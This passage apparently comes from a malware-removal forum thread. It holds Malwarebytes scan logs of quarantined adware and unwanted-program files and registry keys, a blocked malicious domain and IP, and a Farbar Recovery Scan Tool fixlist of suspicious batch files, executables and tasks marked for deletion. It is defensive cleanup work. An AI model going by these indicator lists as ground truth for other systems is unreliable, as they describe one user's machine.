PUP.Optional.WinYahoo, HKU\S-1-5-21-1787623747-1286628437-3931833605-1001\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{A62ABDEE-78A2-4DDB-9355-1C334ABD6E43}, Quarantined, [58], [182758],1.0.3611
PUP.Optional.WinYahoo, HKLM\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{A62ABDEE-78A2-4DDB-9355-1C334ABD6E43}, Quarantined, [58], [182758],1.0.3611
PUP.Optional.WinYahoo, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{a62abdee-78a2-4ddb-9355-1c334abd6e43}, Quarantined, [58], [182758],1.0.3611
PUP.Optional.MailRu, HKU\S-1-5-21-1787623747-1286628437-3931833605-1001\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{FFEBBF0A-C22C-4172-89FF-45215A135AC7}, Quarantined, [635], [382913],1.0.3611
PUP.Optional.MailRu, HKLM\SOFTWARE\WOW6432NODE\GOOGLE\CHROME\EXTENSIONS\bhjhnafpiilpffhglajcaepjbnbjemci, Quarantined, [635], [448286],1.0.3611
PUP.Optional.MailRu, HKLM\SOFTWARE\WOW6432NODE\GOOGLE\CHROME\EXTENSIONS\hcadgijmedbfgciegjomfpjcdchlhnif, Quarantined, [635], [403165],1.0.3611
PUP.Optional.WinYahoo, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\{5B47B387-0BC7-6207-BA47-12876AC7C107}, Quarantined, [58], [302717],1.0.3611
PUP.Optional.WinYahoo, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\{4846A086-18C6-7106-A946-018679C6D206}, Quarantined, [58], [302717],1.0.3611
 
Registry Value: 11
PUP.Optional.WinYahoo, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}|URL, Quarantined, [58], [182758],1.0.3611
PUP.Optional.WinYahoo, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{a62abdee-78a2-4ddb-9355-1c334abd6e43}|URL, Quarantined, [58], [182758],1.0.3611
PUP.Optional.NotChromeRun, HKU\S-1-5-21-1787623747-1286628437-3931833605-1001\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|CHROMIUM, Quarantined, [1343], [391151],1.0.3611
PUP.Optional.WinYahoo, HKU\S-1-5-21-1787623747-1286628437-3931833605-1001\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}|URL, Quarantined, [58], [182757],1.0.3611
PUP.Optional.MailRu, HKU\S-1-5-21-1787623747-1286628437-3931833605-1001\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{FFEBBF0A-C22C-4172-89FF-45215A135AC7}|URL, Quarantined, [635], [382913],1.0.3611
PUP.Optional.MailRu, HKU\S-1-5-21-1787623747-1286628437-3931833605-1001\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{FFEBBF0A-C22C-4172-89FF-45215A135AC7}|FAVICONURLFALLBACK, Quarantined, [635], [382913],1.0.3611
PUP.Optional.MailRu, HKU\S-1-5-21-1787623747-1286628437-3931833605-1001\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{FFEBBF0A-C22C-4172-89FF-45215A135AC7}|SUGGESTIONSURL, Quarantined, [635], [382913],1.0.3611
PUP.Optional.WinYahoo, HKLM\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}|URL, Quarantined, [58], [182758],1.0.3611
PUP.Optional.WinYahoo, HKLM\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{a62abdee-78a2-4ddb-9355-1c334abd6e43}|URL, Quarantined, [58], [182758],1.0.3611
PUP.Optional.StartPage, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{09D44C2A-F732-482A-9D07-60B1ECD11A01}|PATH, Quarantined, [40], [474794],1.0.3611
PUP.Optional.WinYahoo, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{BBA5791A-0D72-4917-8082-E0C646CDBFCD}|PATH, Quarantined, [58], [308967],1.0.3611
 
Registry Data: 1
PUP.Optional.WinYahoo, HKLM\SOFTWARE\MICROSOFT\INTERNET EXPLORER\MAIN|START PAGE, Replaced, [58], [293461],1.0.3611
 
Data Stream: 0
(No malicious items detected)
 
Folder: 7
PUP.Optional.WinYahoo.TskLnk, C:\PROGRAMDATA\{959150F2-1FD3-DA34-9915-44760357CFB8}, Quarantined, [495], [453921],1.0.3611
PUP.Optional.WinYahoo.TskLnk, C:\USERS\OUROBOROS\APPDATA\LOCAL\447123AD-7416-1893-A863-7ED1A81B6B4D, Quarantined, [495], [455040],1.0.3611
PUP.Optional.WinYahoo, C:\Users\ouroboros\AppData\Local\{8210B44C-A6B8-D8F4-CB20-FD1CEF480184}\HowToRemove, Quarantined, [58], [302717],1.0.3611
PUP.Optional.WinYahoo, C:\USERS\OUROBOROS\APPDATA\LOCAL\{8210B44C-A6B8-D8F4-CB20-FD1CEF480184}, Quarantined, [58], [302717],1.0.3611
PUP.Optional.WinYahoo, C:\Users\ouroboros\AppData\Local\{FCD3CA8F-D87B-A637-B5E3-83DF918B7F47}\HowToRemove, Quarantined, [58], [302717],1.0.3611
PUP.Optional.WinYahoo, C:\USERS\OUROBOROS\APPDATA\LOCAL\{FCD3CA8F-D87B-A637-B5E3-83DF918B7F47}, Quarantined, [58], [302717],1.0.3611
PUP.Optional.PriceFountain.TskLnk, C:\USERS\OUROBOROS\APPDATA\LOCAL\NOBBLEABSORBS, Quarantined, [8266], [431028],1.0.3611
 
File: 95
PUP.Optional.SearchManager, C:\USERS\OUROBOROS\APPDATA\LOCAL\CHROMIUM\USER DATA\DEFAULT\LOCAL STORAGE\chrome-extension_pilplloabdedfmialnfchjomjmpjcoej_0.localstorage, Quarantined, [489], [260989],1.0.3611
PUP.Optional.WinYahoo, C:\WINDOWS\TASKS\Yahoo! Powered fisal.job, Quarantined, [58], [308966],1.0.3611
PUP.Optional.WinYahoo, C:\WINDOWS\SYSTEM32\TASKS\Yahoo! Powered fisal, Quarantined, [58], [308969],1.0.3611
PUP.Optional.SearchManager, C:\USERS\OUROBOROS\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\Default\LOCAL STORAGE\chrome-extension_pilplloabdedfmialnfchjomjmpjcoej_0.localstorage, Quarantined, [489], [453138],1.0.3611
PUP.Optional.WinYahoo.TskLnk, C:\PROGRAMDATA\{959150F2-1FD3-DA34-9915-44760357CFB8}\mimi.txt, Quarantined, [495], [453921],1.0.3611
PUP.Optional.WinYahoo.TskLnk, C:\ProgramData\{959150F2-1FD3-DA34-9915-44760357CFB8}\aowLC, Quarantined, [495], [453921],1.0.3611
PUP.Optional.WinYahoo.TskLnk, C:\ProgramData\{959150F2-1FD3-DA34-9915-44760357CFB8}\codafa, Quarantined, [495], [453921],1.0.3611
PUP.Optional.WinYahoo.TskLnk, C:\ProgramData\{959150F2-1FD3-DA34-9915-44760357CFB8}\dimica, Quarantined, [495], [453921],1.0.3611
PUP.Optional.WinYahoo.TskLnk, C:\ProgramData\{959150F2-1FD3-DA34-9915-44760357CFB8}\hdat1, Quarantined, [495], [453921],1.0.3611
PUP.Optional.WinYahoo.TskLnk, C:\ProgramData\{959150F2-1FD3-DA34-9915-44760357CFB8}\hdat2, Quarantined, [495], [453921],1.0.3611
PUP.Optional.WinYahoo.TskLnk, C:\ProgramData\{959150F2-1FD3-DA34-9915-44760357CFB8}\Hvpjd, Quarantined, [495], [453921],1.0.3611
PUP.Optional.WinYahoo.TskLnk, C:\WINDOWS\SYSTEM32\TASKS\Yahoo! Powered fisal, Quarantined, [495], [-1],0.0.0
PUP.Optional.WinYahoo.TskLnk, C:\WINDOWS\SYSTEM32\TASKS\{447123AD-7416-1893-A863-7ED1A81B6B4D}, Quarantined, [495], [455040],1.0.3611
PUP.Optional.WinYahoo.TskLnk, C:\USERS\OUROBOROS\APPDATA\LOCAL\447123AD-7416-1893-A863-7ED1A81B6B4D\Sync.exe, Quarantined, [495], [455040],1.0.3611
PUP.Optional.WinYahoo.TskLnk, C:\Users\ouroboros\AppData\Local\447123AD-7416-1893-A863-7ED1A81B6B4D\info.dat, Quarantined, [495], [455040],1.0.3611
PUP.Optional.WinYahoo.TskLnk, C:\Users\ouroboros\AppData\Local\447123AD-7416-1893-A863-7ED1A81B6B4D\STTL.DAT, Quarantined, [495], [455040],1.0.3611
PUP.Optional.WinYahoo.TskLnk, C:\Users\ouroboros\AppData\Local\447123AD-7416-1893-A863-7ED1A81B6B4D\TTL.DAT, Quarantined, [495], [455040],1.0.3611
PUP.Optional.WinYahoo.TskLnk, C:\WINDOWS\SYSTEM32\TASKS\{447123AD-7416-1893-A863-7ED1A81B6B4D}, Quarantined, [495], [-1],0.0.0
PUP.Optional.StartPage, C:\WINDOWS\SYSTEM32\TASKS\BLTOPNCOMHOHOJ, Quarantined, [40], [474793],1.0.3611
PUP.Optional.hTab, C:\USERS\OUROBOROS\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\Default\Secure Preferences, Removal Failed, [15018], [460276],1.0.3611
PUP.Optional.SearchManager, C:\USERS\OUROBOROS\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\Default\Secure Preferences, Removal Failed, [489], [440037],1.0.3611
PUP.Optional.SearchManager, C:\USERS\OUROBOROS\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\Default\Secure Preferences, Removal Failed, [489], [183362],1.0.3611
PUP.Optional.WinYahoo, C:\USERS\OUROBOROS\APPDATA\ROAMING\MOZILLA\FIREFOX\PROFILES\IUFRUQDN.DEFAULT\SEARCHPLUGINS\YHS.XML, Quarantined, [58], [457864],1.0.3611
PUP.Optional.MailRu, C:\USERS\OUROBOROS\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\Default\Secure Preferences, Removal Failed, [635], [448286],1.0.3611
PUP.Optional.MailRu, C:\USERS\OUROBOROS\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\Default\Secure Preferences, Removal Failed, [635], [403165],1.0.3611
PUP.Optional.WinYahoo, C:\USERS\OUROBOROS\APPDATA\LOCAL\{8210B44C-A6B8-D8F4-CB20-FD1CEF480184}\HOWTOREMOVE\HOWTOREMOVE.HTML, Quarantined, [58], [302717],1.0.3611
PUP.Optional.WinYahoo, C:\Users\ouroboros\AppData\Local\{8210B44C-A6B8-D8F4-CB20-FD1CEF480184}\HowToRemove\chromium-min.jpg, Quarantined, [58], [302717],1.0.3611
PUP.Optional.WinYahoo, C:\Users\ouroboros\AppData\Local\{8210B44C-A6B8-D8F4-CB20-FD1CEF480184}\HowToRemove\control panel-min-min.JPG, Quarantined, [58], [302717],1.0.3611
PUP.Optional.WinYahoo, C:\Users\ouroboros\AppData\Local\{8210B44C-A6B8-D8F4-CB20-FD1CEF480184}\HowToRemove\down.png, Quarantined, [58], [302717],1.0.3611
PUP.Optional.WinYahoo, C:\Users\ouroboros\AppData\Local\{8210B44C-A6B8-D8F4-CB20-FD1CEF480184}\HowToRemove\ff menu.JPG, Quarantined, [58], [302717],1.0.3611
PUP.Optional.WinYahoo, C:\Users\ouroboros\AppData\Local\{8210B44C-A6B8-D8F4-CB20-FD1CEF480184}\HowToRemove\ff search engine-min.png, Quarantined, [58], [302717],1.0.3611
PUP.Optional.WinYahoo, C:\Users\ouroboros\AppData\Local\{8210B44C-A6B8-D8F4-CB20-FD1CEF480184}\HowToRemove\hp-min ff.png, Quarantined, [58], [302717],1.0.3611
PUP.Optional.WinYahoo, C:\Users\ouroboros\AppData\Local\{8210B44C-A6B8-D8F4-CB20-FD1CEF480184}\HowToRemove\hp-min ie.png, Quarantined, [58], [302717],1.0.3611
PUP.Optional.WinYahoo, C:\Users\ouroboros\AppData\Local\{8210B44C-A6B8-D8F4-CB20-FD1CEF480184}\HowToRemove\search engine.gif, Quarantined, [58], [302717],1.0.3611
PUP.Optional.WinYahoo, C:\Users\ouroboros\AppData\Local\{8210B44C-A6B8-D8F4-CB20-FD1CEF480184}\HowToRemove\setup pages.gif, Quarantined, [58], [302717],1.0.3611
PUP.Optional.WinYahoo, C:\Users\ouroboros\AppData\Local\{8210B44C-A6B8-D8F4-CB20-FD1CEF480184}\HowToRemove\sp-min.png, Quarantined, [58], [302717],1.0.3611
PUP.Optional.WinYahoo, C:\Users\ouroboros\AppData\Local\{8210B44C-A6B8-D8F4-CB20-FD1CEF480184}\HowToRemove\start-min.jpg, Quarantined, [58], [302717],1.0.3611
PUP.Optional.WinYahoo, C:\Users\ouroboros\AppData\Local\{8210B44C-A6B8-D8F4-CB20-FD1CEF480184}\HowToRemove\up.png, Quarantined, [58], [302717],1.0.3611
PUP.Optional.WinYahoo, C:\Users\ouroboros\AppData\Local\{8210B44C-A6B8-D8F4-CB20-FD1CEF480184}\cidemonet.dat, Quarantined, [58], [302717],1.0.3611
PUP.Optional.WinYahoo, C:\Users\ouroboros\AppData\Local\{8210B44C-A6B8-D8F4-CB20-FD1CEF480184}\didarec.cfg, Quarantined, [58], [302717],1.0.3611
PUP.Optional.WinYahoo, C:\Users\ouroboros\AppData\Local\{8210B44C-A6B8-D8F4-CB20-FD1CEF480184}\dofeno, Quarantined, [58], [302717],1.0.3611
PUP.Optional.WinYahoo, C:\Users\ouroboros\AppData\Local\{8210B44C-A6B8-D8F4-CB20-FD1CEF480184}\install.log, Quarantined, [58], [302717],1.0.3611
PUP.Optional.WinYahoo, C:\Users\ouroboros\AppData\Local\{8210B44C-A6B8-D8F4-CB20-FD1CEF480184}\latecole, Quarantined, [58], [302717],1.0.3611
PUP.Optional.WinYahoo, C:\Users\ouroboros\AppData\Local\{8210B44C-A6B8-D8F4-CB20-FD1CEF480184}\lifosoto.dat, Quarantined, [58], [302717],1.0.3611
PUP.Optional.WinYahoo, C:\Users\ouroboros\AppData\Local\{8210B44C-A6B8-D8F4-CB20-FD1CEF480184}\lilenil.dat, Quarantined, [58], [302717],1.0.3611
PUP.Optional.WinYahoo, C:\Users\ouroboros\AppData\Local\{8210B44C-A6B8-D8F4-CB20-FD1CEF480184}\racetodet, Quarantined, [58], [302717],1.0.3611
PUP.Optional.WinYahoo, C:\Users\ouroboros\AppData\Local\{8210B44C-A6B8-D8F4-CB20-FD1CEF480184}\somalicot, Quarantined, [58], [302717],1.0.3611
PUP.Optional.WinYahoo, C:\Users\ouroboros\AppData\Local\{8210B44C-A6B8-D8F4-CB20-FD1CEF480184}\Sqlite3.dll, Quarantined, [58], [302717],1.0.3611
PUP.Optional.WinYahoo, C:\Users\ouroboros\AppData\Local\{8210B44C-A6B8-D8F4-CB20-FD1CEF480184}\titeca.dat, Quarantined, [58], [302717],1.0.3611
PUP.Optional.WinYahoo, C:\Users\ouroboros\AppData\Local\{8210B44C-A6B8-D8F4-CB20-FD1CEF480184}\uninst.dat, Quarantined, [58], [302717],1.0.3611
PUP.Optional.WinYahoo, C:\Users\ouroboros\AppData\Local\{8210B44C-A6B8-D8F4-CB20-FD1CEF480184}\uninst.exe, Quarantined, [58], [302717],1.0.3611
PUP.Optional.WinYahoo, C:\Users\ouroboros\AppData\Local\{8210B44C-A6B8-D8F4-CB20-FD1CEF480184}\uninstp.dat, Quarantined, [58], [302717],1.0.3611
PUP.Optional.WinYahoo, C:\USERS\OUROBOROS\APPDATA\LOCAL\{FCD3CA8F-D87B-A637-B5E3-83DF918B7F47}\HOWTOREMOVE\HOWTOREMOVE.HTML, Quarantined, [58], [302717],1.0.3611
PUP.Optional.WinYahoo, C:\Users\ouroboros\AppData\Local\{FCD3CA8F-D87B-A637-B5E3-83DF918B7F47}\HowToRemove\chromium-min.jpg, Quarantined, [58], [302717],1.0.3611
PUP.Optional.WinYahoo, C:\Users\ouroboros\AppData\Local\{FCD3CA8F-D87B-A637-B5E3-83DF918B7F47}\HowToRemove\control panel-min-min.JPG, Quarantined, [58], [302717],1.0.3611
PUP.Optional.WinYahoo, C:\Users\ouroboros\AppData\Local\{FCD3CA8F-D87B-A637-B5E3-83DF918B7F47}\HowToRemove\down.png, Quarantined, [58], [302717],1.0.3611
PUP.Optional.WinYahoo, C:\Users\ouroboros\AppData\Local\{FCD3CA8F-D87B-A637-B5E3-83DF918B7F47}\HowToRemove\ff menu.JPG, Quarantined, [58], [302717],1.0.3611
PUP.Optional.WinYahoo, C:\Users\ouroboros\AppData\Local\{FCD3CA8F-D87B-A637-B5E3-83DF918B7F47}\HowToRemove\ff search engine-min.png, Quarantined, [58], [302717],1.0.3611
PUP.Optional.WinYahoo, C:\Users\ouroboros\AppData\Local\{FCD3CA8F-D87B-A637-B5E3-83DF918B7F47}\HowToRemove\hp-min ff.png, Quarantined, [58], [302717],1.0.3611
PUP.Optional.WinYahoo, C:\Users\ouroboros\AppData\Local\{FCD3CA8F-D87B-A637-B5E3-83DF918B7F47}\HowToRemove\hp-min ie.png, Quarantined, [58], [302717],1.0.3611
PUP.Optional.WinYahoo, C:\Users\ouroboros\AppData\Local\{FCD3CA8F-D87B-A637-B5E3-83DF918B7F47}\HowToRemove\search engine.gif, Quarantined, [58], [302717],1.0.3611
PUP.Optional.WinYahoo, C:\Users\ouroboros\AppData\Local\{FCD3CA8F-D87B-A637-B5E3-83DF918B7F47}\HowToRemove\setup pages.gif, Quarantined, [58], [302717],1.0.3611
PUP.Optional.WinYahoo, C:\Users\ouroboros\AppData\Local\{FCD3CA8F-D87B-A637-B5E3-83DF918B7F47}\HowToRemove\sp-min.png, Quarantined, [58], [302717],1.0.3611
PUP.Optional.WinYahoo, C:\Users\ouroboros\AppData\Local\{FCD3CA8F-D87B-A637-B5E3-83DF918B7F47}\HowToRemove\start-min.jpg, Quarantined, [58], [302717],1.0.3611
PUP.Optional.WinYahoo, C:\Users\ouroboros\AppData\Local\{FCD3CA8F-D87B-A637-B5E3-83DF918B7F47}\HowToRemove\up.png, Quarantined, [58], [302717],1.0.3611
PUP.Optional.WinYahoo, C:\Users\ouroboros\AppData\Local\{FCD3CA8F-D87B-A637-B5E3-83DF918B7F47}\cifatafe, Quarantined, [58], [302717],1.0.3611
PUP.Optional.WinYahoo, C:\Users\ouroboros\AppData\Local\{FCD3CA8F-D87B-A637-B5E3-83DF918B7F47}\install.log, Quarantined, [58], [302717],1.0.3611
PUP.Optional.WinYahoo, C:\Users\ouroboros\AppData\Local\{FCD3CA8F-D87B-A637-B5E3-83DF918B7F47}\latecole, Quarantined, [58], [302717],1.0.3611
PUP.Optional.WinYahoo, C:\Users\ouroboros\AppData\Local\{FCD3CA8F-D87B-A637-B5E3-83DF918B7F47}\lifosoto.dat, Quarantined, [58], [302717],1.0.3611
PUP.Optional.WinYahoo, C:\Users\ouroboros\AppData\Local\{FCD3CA8F-D87B-A637-B5E3-83DF918B7F47}\lilenil.dat, Quarantined, [58], [302717],1.0.3611
PUP.Optional.WinYahoo, C:\Users\ouroboros\AppData\Local\{FCD3CA8F-D87B-A637-B5E3-83DF918B7F47}\racetodet, Quarantined, [58], [302717],1.0.3611
PUP.Optional.WinYahoo, C:\Users\ouroboros\AppData\Local\{FCD3CA8F-D87B-A637-B5E3-83DF918B7F47}\somalicot, Quarantined, [58], [302717],1.0.3611
PUP.Optional.WinYahoo, C:\Users\ouroboros\AppData\Local\{FCD3CA8F-D87B-A637-B5E3-83DF918B7F47}\Sqlite3.dll, Quarantined, [58], [302717],1.0.3611
PUP.Optional.WinYahoo, C:\Users\ouroboros\AppData\Local\{FCD3CA8F-D87B-A637-B5E3-83DF918B7F47}\titeca.dat, Quarantined, [58], [302717],1.0.3611
PUP.Optional.WinYahoo, C:\Users\ouroboros\AppData\Local\{FCD3CA8F-D87B-A637-B5E3-83DF918B7F47}\uninst.dat, Quarantined, [58], [302717],1.0.3611
PUP.Optional.WinYahoo, C:\Users\ouroboros\AppData\Local\{FCD3CA8F-D87B-A637-B5E3-83DF918B7F47}\uninst.exe, Quarantined, [58], [302717],1.0.3611
PUP.Optional.PriceFountain.TskLnk, C:\USERS\OUROBOROS\APPDATA\LOCAL\NOBBLEABSORBS\RKEY.DAT, Quarantined, [8266], [431028],1.0.3611
PUP.Optional.PriceFountain.TskLnk, C:\Users\ouroboros\AppData\Local\NobbleAbsorbs\Aliexpress .lnk, Quarantined, [8266], [431028],1.0.3611
PUP.Optional.PriceFountain.TskLnk, C:\Users\ouroboros\AppData\Local\NobbleAbsorbs\Aliexpress.ico, Quarantined, [8266], [431028],1.0.3611
PUP.Optional.PriceFountain.TskLnk, C:\Users\ouroboros\AppData\Local\NobbleAbsorbs\Aliexpress.lnk, Quarantined, [8266], [431028],1.0.3611
PUP.Optional.PriceFountain.TskLnk, C:\Users\ouroboros\AppData\Local\NobbleAbsorbs\Aliexpress.smenu.URL, Quarantined, [8266], [431028],1.0.3611
PUP.Optional.PriceFountain.TskLnk, C:\Users\ouroboros\AppData\Local\NobbleAbsorbs\Aliexpress.tbar.URL, Quarantined, [8266], [431028],1.0.3611
PUP.Optional.PriceFountain.TskLnk, C:\Users\ouroboros\AppData\Local\NobbleAbsorbs\AweatherSciatic.dat, Quarantined, [8266], [431028],1.0.3611
PUP.Optional.PriceFountain.TskLnk, C:\Users\ouroboros\AppData\Local\NobbleAbsorbs\Booking .lnk, Quarantined, [8266], [431028],1.0.3611
PUP.Optional.PriceFountain.TskLnk, C:\Users\ouroboros\AppData\Local\NobbleAbsorbs\Booking.ico, Quarantined, [8266], [431028],1.0.3611
PUP.Optional.PriceFountain.TskLnk, C:\Users\ouroboros\AppData\Local\NobbleAbsorbs\Booking.lnk, Quarantined, [8266], [431028],1.0.3611
PUP.Optional.PriceFountain.TskLnk, C:\Users\ouroboros\AppData\Local\NobbleAbsorbs\Booking.smenu.URL, Quarantined, [8266], [431028],1.0.3611
PUP.Optional.PriceFountain.TskLnk, C:\Users\ouroboros\AppData\Local\NobbleAbsorbs\Booking.tbar.URL, Quarantined, [8266], [431028],1.0.3611
Adware.FileTour, C:\USERS\OUROBOROS\APPDATA\LOCAL\TEMP\IS-DTF68.TMP\KAV2.DLL, Quarantined, [150], [423225],1.0.3611
Adware.FileTour, C:\USERS\OUROBOROS\APPDATA\LOCAL\TEMP\IS-082E9.TMP\58541165, Quarantined, [150], [423225],1.0.3611
Adware.FileTour, C:\USERS\OUROBOROS\APPDATA\LOCAL\TEMP\12711379.EXE, Quarantined, [150], [474039],1.0.3611
Adware.FileTour, C:\USERS\OUROBOROS\APPDATA\LOCAL\TEMP\IS-082E9.TMP\E1E735E0, Quarantined, [150], [413261],1.0.3611
Adware.FileTour, C:\USERS\OUROBOROS\APPDATA\LOCAL\TEMP\BIT5D01.TMP, Quarantined, [150], [474039],1.0.3611
PUP.Optional.GameHack, C:\PROGRAM FILES (X86)\CHEAT ENGINE 6.7\STANDALONEPHASE1.DAT, Quarantined, [663], [393793],1.0.3611
CheatTool.CETTrainer, C:\USERS\OUROBOROS\DOCUMENTS\STARDEW VALLEY V2.27.2016 TRAINER +5 MRANTIFUN.EXE, Quarantined, [7793], [116813],1.0.3611
 
Physical Sector: 0
(No malicious items detected)
 
 
(end)
 
Malwarebytes
www.malwarebytes.com
 
-Log Details-
Scan Date: 1/3/18
Scan Time: 8:27 PM
Log File: 7597275c-f081-11e7-be9d-2c56dc0b4679.json
Administrator: Yes
 
-Software Information-
Version: 3.3.1.2183
Components Version: 1.0.262
Update Package Version: 1.0.3614
License: Trial
 
-System Information-
OS: Windows 10 (Build 16299.125)
CPU: x64
File System: NTFS
User: ENJAY\ouroboros
 
-Scan Summary-
Scan Type: Threat Scan
Result: Completed
Objects Scanned: 379844
Threats Detected: 1
Threats Quarantined: 1
Time Elapsed: 8 min, 23 sec
 
-Scan Options-
Memory: Enabled
Startup: Enabled
Filesystem: Enabled
Archives: Enabled
Rootkits: Disabled
Heuristics: Enabled
PUP: Detect
PUM: Detect
 
-Scan Details-
Process: 0
(No malicious items detected)
 
Module: 0
(No malicious items detected)
 
Registry Key: 0
(No malicious items detected)
 
Registry Value: 0
(No malicious items detected)
 
Registry Data: 0
(No malicious items detected)
 
Data Stream: 0
(No malicious items detected)
 
Folder: 0
(No malicious items detected)
 
File: 1
Adware.FileTour, C:\USERS\OUROBOROS\APPDATA\LOCAL\TEMP\BIT47DA.TMP, Quarantined, [150], [474039],1.0.3614
 
Physical Sector: 0
(No malicious items detected)
 
 
(end)
 
Malwarebytes
www.malwarebytes.com
 
-Log Details-
Protection Event Date: 1/4/18
Protection Event Time: 5:50 PM
Log File: c3586b3c-f134-11e7-a6f2-2c56dc0b4679.json
Administrator: Yes
 
-Software Information-
Version: 3.3.1.2183
Components Version: 1.0.262
Update Package Version: 1.0.3619
License: Trial
 
-System Information-
OS: Windows 10 (Build 16299.125)
CPU: x64
File System: NTFS
User: System
 
-Blocked Website Details-
Malicious Website: 1
, , Blocked, [-1], [-1],0.0.0
 
-Website Data-
Category: Unspecified
Domain: link.safecart.com
IP Address: 45.64.64.38
Port: [49861]
Type: Outbound
File: C:\Users\ouroboros\AppData\Local\Google\Chrome\Application\chrome.exe
 
 
 
(end)
 
Malwarebytes
www.malwarebytes.com
 
-Log Details-
Scan Date: 1/3/18
Scan Time: 8:19 PM
Log File: 4f582970-f080-11e7-b36b-2c56dc0b4679.json
Administrator: Yes
 
-Software Information-
Version: 3.3.1.2183
Components Version: 1.0.262
Update Package Version: 1.0.3614
License: Trial
 
-System Information-
OS: Windows 10 (Build 16299.125)
CPU: x64
File System: NTFS
User: ENJAY\ouroboros
 
-Scan Summary-
Scan Type: Threat Scan
Result: Completed
Objects Scanned: 379860
Threats Detected: 1
Threats Quarantined: 1
Time Elapsed: 5 min, 20 sec
 
-Scan Options-
Memory: Enabled
Startup: Enabled
Filesystem: Enabled
Archives: Enabled
Rootkits: Disabled
Heuristics: Enabled
PUP: Detect
PUM: Detect
 
-Scan Details-
Process: 0
(No malicious items detected)
 
Module: 0
(No malicious items detected)
 
Registry Key: 0
(No malicious items detected)
 
Registry Value: 0
(No malicious items detected)
 
Registry Data: 0
(No malicious items detected)
 
Data Stream: 0
(No malicious items detected)
 
Folder: 0
(No malicious items detected)
 
File: 1
Adware.FileTour, C:\USERS\OUROBOROS\APPDATA\LOCAL\TEMP\BIT47DA.TMP, Quarantined, [150], [474039],1.0.3614
 
Physical Sector: 0
(No malicious items detected)
 
 
(end)
 
 


#6 Aura

Aura

    Bleepin' Special Ops


  • Malware Response Team
  • 19,634 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:10:26 AM

Posted 05 January 2018 - 11:01 AM

Thank you. The file from the link you PM'd me didn't have anything malicious in it. Any ideas of what else you downloaded and installed? Maybe around January 3rd? In the last week.

Also, follow the instructions below.

iO3R662.pngFarbar Recovery Scan Tool (FRST) - Fix mode
Follow the instructions below to execute a fix on your system using FRST, and provide the log in your next reply.
  • Download the attached fixlist.txt file, and save it on your Desktop (or wherever your FRST.exe/FRST64.exe executable is located)
  • Right-click on the FRST executable and select Spcusrh.pngRun as Administrator (for Windows Vista, 7, 8, 8.1 and 10 users)
  • Click on the Fix button
    NYA5Cbr.png
  • On completion, a message will come up saying that the fix has been completed and it'll open a log in Notepad
  • Copy and paste its content in your next reply

Attached Files


unite_blue.png
Security Administrator | Sysnative Windows Update Senior Analyst | Malware Hunter | @SecurityAura
My timezone UTC-05:00 (East. Coast). If I didn't reply to you within 48 hours, please send me a PM.


#7 oneiric

oneiric
  • Topic Starter

  • Members
  • 9 posts
  • OFFLINE
  •  
  • Local time:10:26 PM

Posted 05 January 2018 - 11:51 AM

Really? That's weird, I'll resend you a link on the site itself. I haven't really installed anything else rather than Malwarebytes, ADWcleaner and HitmanPro.

 

Fix result of Farbar Recovery Scan Tool (x64) Version: 02.01.2018
Ran by ouroboros (06-01-2018 00:34:11) Run:2
Running from C:\Users\ouroboros\Desktop
Loaded Profiles: ouroboros (Available Profiles: ouroboros & Visitor)
Boot Mode: Normal
==============================================
 
fixlist content:
*****************
CloseProcesses:
CreateRestorePoint:
 
cmd: type C:\WINDOWS\SysWOW64\eYyo.bat
cmd: type C:\WINDOWS\aVPIeFZA.bat
cmd: type "C:\Program Files (x86)\Common Files\EnAWI.bat"
cmd: type "C:\Program Files (x86)\Common Files\rYms.bat"
 
C:\Program Files (x86)\Common Files\EnAWI
C:\Program Files (x86)\Common Files\rYms
C:\Program Files (x86)\Common Files\rYms.bat
C:\Program Files (x86)\Common Files\EnAWI.bat
C:\Program Files (x86)\Common Files\CyIPiOCiIR.exe
C:\ProgramData\boost_interprocess
C:\ProgramData\ntuser.pol
C:\Users\OUROBO~1\AppData\Local\447123~1
C:\Users\OUROBO~1\AppData\Local\Geburo
C:\Users\ouroboros\AppData\Local\lptx123456
C:\Users\ouroboros\AppData\Local\HvpjdXLztn
C:\Users\ouroboros\AppData\Roaming\sp_data.sys
C:\WINDOWS\aVPIeFZA
C:\WINDOWS\aVPIeFZA.bat
C:\WINDOWS\SysWOW64\eYyo
C:\WINDOWS\SysWOW64\eYyo.bat
C:\WINDOWS\SysWOW64\iYWHkUpEd.exe
 
Task: {55A4A116-810E-4EB9-A283-07E1A4D4A39A} - System32\Tasks\aoIYY => C:\WINDOWS\aVPIeFZA.bat [2017-09-29] () <==== ATTENTION
